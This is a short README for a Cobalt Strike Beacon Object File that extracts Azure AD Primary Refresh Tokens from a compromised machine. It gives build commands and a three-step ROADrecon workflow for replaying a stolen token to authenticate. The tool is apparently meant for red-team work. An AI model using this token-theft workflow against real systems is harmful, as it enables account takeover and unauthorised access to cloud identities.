aad_prt_bof
This BOF (Beacon Object File) allows Cobalt Strike to extract Azure AD PRT tokens from the machine. These tokens can then be used with tools like ROADTools to extract AAD information.
How to compile
- `make` for the beacon object files
- `make test` for an executable
Usage
After compiling, load the `aadprt.cna` file into Cobalt Strike.
- Request a nonce using ROADrecon: `roadrecon auth --prt-init`
- Request a token on the target machine: `aadprt [NONCE]`
- Use the token to authenticate in ROADrecon (or any other tool): `roadrecon auth --prt-cookie [TOKEN]`
- Profit!
References
Heavily inspired by the awesome work and research of Dirk-jan and Lee.